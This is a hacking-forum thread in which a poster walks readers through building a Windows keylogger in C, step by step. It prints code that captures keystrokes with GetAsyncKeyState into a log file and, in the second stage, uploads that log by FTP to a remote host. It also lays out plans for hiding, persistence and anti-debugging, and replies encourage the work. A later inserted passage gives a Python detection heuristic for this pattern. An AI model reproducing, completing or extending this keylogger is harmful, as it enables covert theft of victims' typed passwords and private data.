Keylogger Development Project


Guest
Posted on 24-01-10 02:50
So I've decided to do something a bit different. Instead of just a guide or submitting working code to the code bank, I'm going to try and include as many people that want to take part.

The goal of this project is to familiarize people with C and the MSDN libraries, in a hopefully fun and interactive way.

I've written a basic outline of how to log keys using GetAsyncKey. It does not currently work (well it does but I won't post it all). Then I left instructions on usage and to-dos for you to fix/add.

The first part I've kept as simple as possible (i.e., you don't need to worry about pointers in this part), and hopefully commented where necessary. Note: It doesn't follow a perfectly sync logic structure as I tried to show a few different ways to capture keys. Note this should be easy.

Anywho:

Tasks:
*Build a main function and link to the GetKey function.
*Add additional functionality with extra keys.
*Compile and run


Notes: Win XP 32 dev c++ 4.9.9.2 compiled it.

pastebin code
http://pastebin.c. . .

Code

#include <stdio.h>
#include <windows.h>
#include <winuser.h>

extern FILE *out_file;

/*
stdio's keylogger v.01

Compiled on Dev-C++ 4.9.9.2 WinXP 32 Bit

Key Debounce Line ***Just FYI***
while(GetAsyncKeyState(character)==-32768){}

MSDN KEY CODES
http://msdn.microsoft.com/en-us/library/ms927178.aspx

GetAsyncKeyState MSDN Reference
http://msdn.microsoft.com/en-us/library/ms646293(VS.85).aspx

To do: Add Numpad Support, Fnums support, Punctuation.

To use: Build a main function and link to this code.

*/

int GetKey()
{
    short character;
    Sleep(30);
   
    /*ALPHA CHARACTERS V_KEY*/
    for (character=0x41;character <= 0x5A;character++)
    {
        if (GetAsyncKeyState(character)==-32768)
        {   
             out_file = fopen("data.log","a+");
             /*UPPERCASE*/
             if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_LSHIFT))
             {                           
                   while(GetAsyncKeyState(character)==-32768){}
                   fputc(character, out_file);
                   fclose(out_file);
             }
             /*LOWERCASE*/
             else
             {
                   while(GetAsyncKeyState(character)==-32768){}
                   fputc(character+0x20, out_file);
                   fclose(out_file);
             }
           
        } 
    }
   
    /*Numerical Row*/
    for (character=0x30;character <= 0x39;character++)
    {
        if (GetAsyncKeyState(character)==-32768)
        {   
             out_file = fopen("data.log","a+");
             
             /*Map Keys to Special Characters*/
             if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT))
             {                           
                   while(GetAsyncKeyState(character)==-32768){}
                   switch(character)
                   {
                        case(0x31):
                                  fputs("!", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x32):
                                  fputs("@", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x33):
                                  fputs("#", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x34):
                                  fputs("$", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x35):
                                  fputs("%", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x36):
                                  fputs("^", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x37):
                                  fputs("&", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x38):
                                  fputs("*", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x39):
                                  fputs("(", out_file);
                                  fclose(out_file);
                                  break;
                       
                        case(0x30):
                                  fputs(")", out_file);
                                  fclose(out_file);
                                  break;
                       
                        default:
                                fputs("Error\n", out_file);
                                fclose(out_file);
                                break;
                   }
                               
             }
             /*Defaulted Numbers*/
             else
             {
                 while(GetAsyncKeyState(character)==-32768){}
                 fputc(character, out_file);
                 fclose(out_file);
             }
           
        } 
    }
     
    /* Catch Single Special Keys */
    if (GetAsyncKeyState(VK_ESCAPE))
    {
       while(GetAsyncKeyState(VK_RETURN)==-32768){}
       out_file = fopen("data.log","a+");
       fputs("[ESC]", out_file);
       fclose(out_file);
    }

    if (GetAsyncKeyState(VK_SPACE))
    {
       while(GetAsyncKeyState(VK_SPACE)==-32768){}
       out_file = fopen("data.log","a+");
       fputs(" ", out_file);
       fclose(out_file);
    }
   
    if (GetAsyncKeyState(VK_RETURN))
    {
       while(GetAsyncKeyState(VK_RETURN)==-32768){}
       out_file = fopen("data.log","a+");
       fputs("\n", out_file);
       fclose(out_file);
    }
   
    if (GetAsyncKeyState(VK_TAB))
    {
       while(GetAsyncKeyState(VK_TAB)==-32768){}
       out_file = fopen("data.log","a+");
       fputs("[TAB]", out_file);
       fclose(out_file);
    }

   
    if (GetAsyncKeyState(VK_BACK))
    {
       while(GetAsyncKeyState(VK_BACK)==-32768){}
       out_file = fopen("data.log","a+");
       fputs("[BACK]", out_file);
       fclose(out_file);
    }
   
    return 0;
}
       

       





I will update it with different things to do (hiding, persistence, sockets, etc) and add it here when I feel like it. Maybe a day or a month ... who knows.




Edited by on 24-01-10 03:08
RE: Keylogger Development Project


Guest
Posted on 25-01-10 15:05
LEVEL 2

First I would like to hear feedback -- positive/negative/indifferent/easy/hard/interesting/boring/etc. If many people just don't care either way I'll stop.

Now for part 2

I've added a few functions that send logs over FTP when the file size hits 2048 bytes (~1 page)

Hopefully if you are following along you have a main function that records keys to a file.
So here's what you get this time.

Objectives are again stated in file but for some redundancy here they are again
*Use the MSDN reference http://msdn.micro. . .S.85).aspx to fill in missing parameters
*Set up an FTP server or use a free web host (x10hosting is the one I used)
*Find wininet compile flag (won't compile without it)
*Update main function accordingly (I have provided a flowchart that my program follows)
*Compile and run

http://pastebin.c. . .

img30.imageshack.us/img30/7976/keyloggerflow.jpg

Code

#include <stdio.h>
#include <wininet.h>
#include <time.h>

/*Part 2
Sending logs
fill in the missing details using
http://msdn.microsoft.com/en-us/library/aa384180%28VS.85%29.aspx
find the linker compile flag for wininet wont compile without it
Use program flow provided and update main function accordingly.
*/

int SendLogs();
int TimeStamp();

extern FILE *out_file;

/*Declare Time Variables*/
struct tm *local;
time_t t;


/*Send Logs over FTP using wininet*/
int SendLogs()
{
    t = time(NULL);
    local = localtime(&t);
   
    HINTERNET hInternet;
    HINTERNET hConnect;
    HINTERNET lRes;
    bool pass;

    hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
    hConnect = InternetConnect(hInternet,"<ftphost>",INTERNET_DEFAULT_FTP_PORT,"what goes here?", "what goes here?", INTERNET_SERVICE_FTP,0,0);                           
    pass = FtpPutFile(hConnect,"data.log",asctime(local),/*Find correct transfer type*/,0);
                               
    InternetCloseHandle(hConnect);
    InternetCloseHandle(hInternet);

    if(pass==false)return 1; //If send fails, it will loop again, Not clearing the Log
    TimeStamp(); // If sends start new log with Time Stamp
    return 0;
}

/*Send on file size > 2048 Bytes (~1page) */
int CheckSize()
{
    int size;
    out_file = fopen("data.log","<how should we open this??>");
    fseek(out_file, 0L, SEEK_END);
    size = ftell(out_file);
    fseek(out_file, 0L, SEEK_SET);
    fclose(out_file);
    if (size > 2048)
    {
             SendLogs();
             return 1; //debugging will stop keylogger after 1 send
    }
    return 0;
}
/*Time Stamps Log file, and Clears Current Content */
int TimeStamp()
{
   
    t = time(NULL);
    local = localtime(&t);
    out_file=fopen("data.log", "w+");
    fputs("------Start Logging Time ------\n", out_file);
    fputs(asctime(local), out_file);
    fputs("-------------------------------\n\n", out_file);
    fclose(out_file);
    return 0;
}





At this point you should have a basic logger that sends data over FTP to your host.

UPCOMING TASKS:
Simple string encryption so username/passwords/ftphosts aren't plainly available under a debugger.
Runtime CRC (cyclic redundancy check) and fail function
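
Seen from the defender's side, the design in the two posts above has a recognisable shape: one process polls GetAsyncKeyState across the whole 0-9 and A-Z virtual-key range every 30 ms and later calls FtpPutFile. The following is an added example, not code from the thread, that runs that heuristic over constructed API-trace records; the record layout, thresholds, PIDs and process names are assumptions.

```python
from collections import defaultdict

# Constructed API-trace records: (timestamp_s, pid, process, api, argument).
# The tuple layout is an assumption for this example, not a real sensor format.
def build_sample_trace():
    events = []
    # pid 4242 sweeps VK 0x30-0x39 and 0x41-0x5A every 30 ms, like the posted loop.
    for sweep in range(5):
        for vk in list(range(0x30, 0x3A)) + list(range(0x41, 0x5B)):
            events.append((sweep * 0.03, 4242, "updater.exe", "GetAsyncKeyState", vk))
    events.append((0.5, 4242, "updater.exe", "FtpPutFileA", "data.log"))
    # pid 1337 polls only four movement keys (W, A, S, D); it should not alert.
    for tick in range(50):
        for vk in (0x41, 0x44, 0x53, 0x57):
            events.append((tick * 0.016, 1337, "game.exe", "GetAsyncKeyState", vk))
    return sorted(events, key=lambda e: e[0])

def find_key_sweeps(events, window=1.0, min_distinct_vks=30):
    """Flag processes that poll many distinct virtual keys inside one time window."""
    polls, uploads, names = defaultdict(list), defaultdict(list), {}
    for ts, pid, proc, api, arg in events:
        names[pid] = proc
        if api == "GetAsyncKeyState":
            polls[pid].append((ts, arg))
        elif api.startswith("FtpPutFile"):
            uploads[pid].append(arg)
    findings = {}
    for pid, seen in polls.items():
        start, best, counts = 0, 0, defaultdict(int)
        for ts, vk in seen:
            counts[vk] += 1
            # Drop polls that fell out of the sliding window.
            while ts - seen[start][0] > window:
                old = seen[start][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            best = max(best, len(counts))
        if best >= min_distinct_vks:
            sent = uploads.get(pid, [])
            findings[pid] = {"process": names[pid], "distinct_vks": best,
                             "ftp_uploads": sent,
                             "severity": "high" if sent else "medium"}
    return findings

if __name__ == "__main__":
    for pid, hit in find_key_sweeps(build_sample_trace()).items():
        print(pid, hit)
```

The distinct-key threshold is what separates a full-keyboard sweep from software that legitimately polls a handful of keys; the FTP upload only raises severity.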




RE: Keylogger Development Project

stealth-
Member



Posts: 1003
Location: Eh?
Joined: 10.04.09
Rank:
Mad User
Posted on 25-01-10 15:39
This sounds like a great project, but unfortunately I don't know C right now :(. As for those who do know C, not sure why they don't seem interested.....


The irony of man's condition is that the deepest need is to be free of the anxiety of death and annihilation; but it is life itself which awakens it, and so we must shrink from being fully alive.
http://www.stealt. . .
http://www.stealth-x.com
RE: Keylogger Development Project


Guest
Posted on 25-01-10 16:51
This is great stdio! I did the same thing to check the file size using fseek() and ftell(). Seeing as I'm completely unfamiliar with sockets for Windows I just used cURL for the FTP upload part. Can't wait to see how hiding the password/username is done as well as the CRC.


RE: Keylogger Development Project

bl4ckc4t
Member

Posts: 591
Location: /etc/
Joined: 07.03.06
Rank:
Wiseman
Posted on 25-01-10 17:46
This is pretty nice, I would say. Gives a simplicity that C doesn't usually have.